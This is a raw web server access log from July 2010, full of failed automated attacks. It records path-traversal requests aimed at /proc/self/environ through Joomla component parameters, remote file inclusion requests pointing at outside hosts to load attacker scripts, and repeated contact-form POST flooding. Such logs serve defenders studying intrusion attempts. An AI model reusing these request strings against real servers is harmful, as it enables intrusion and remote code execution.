211.210.38.8 - - [01/Jul/2010:09:48:17 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.205.67.73 - - [01/Jul/2010:09:53:17 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:09:53:17 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:09:53:18 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:09:53:38 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:09:53:38 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.205.67.73 - - [01/Jul/2010:09:53:38 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.20.196.20 - - [01/Jul/2010:09:57:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:33 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:33 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:33 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:33 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:34 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:34 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:34 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:34 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:34 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:34 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:57:35 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
211.210.38.8 - - [01/Jul/2010:09:58:18 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
195.20.196.20 - - [01/Jul/2010:09:58:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:58 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:58 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:58 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:58 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:59 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:59 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:59 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:58:59 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:59:24 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.120.210.8 - - [01/Jul/2010:09:59:31 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:10:03:41 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:10:03:41 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:10:03:42 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:10:03:46 -0500] "GET /logs/access_log.1276214400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
211.210.38.8 - - [01/Jul/2010:10:04:21 -0500] "GET /logs/access_log.1277424000/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:04:22 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:04:22 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:04:25 -0500] "GET /logs/access_log.1277251200/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:05:41 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
195.20.196.20 - - [01/Jul/2010:10:05:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:05:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:20 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:06:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.46.204.180 - - [01/Jul/2010:10:07:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.180 - - [01/Jul/2010:10:07:45 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.20.196.20 - - [01/Jul/2010:10:08:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:10:08:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.46.204.242 - - [01/Jul/2010:10:08:15 -0500] "GET /artwork/txt.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.231.187.33 - - [01/Jul/2010:10:08:31 -0500] "GET /logs/access_log.1276473600//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:10:08:31 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:10:08:31 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
211.210.38.8 - - [01/Jul/2010:10:13:17 -0500] "GET /logs/access_log.1276473600/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:13:18 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:13:18 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:10:13:34 -0500] "GET /logs/access_log.1276128000/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
60.50.160.28 - - [01/Jul/2010:10:21:44 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
221.144.12.141 - - [01/Jul/2010:10:21:58 -0500] "GET /logs/access_log.1277424000//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
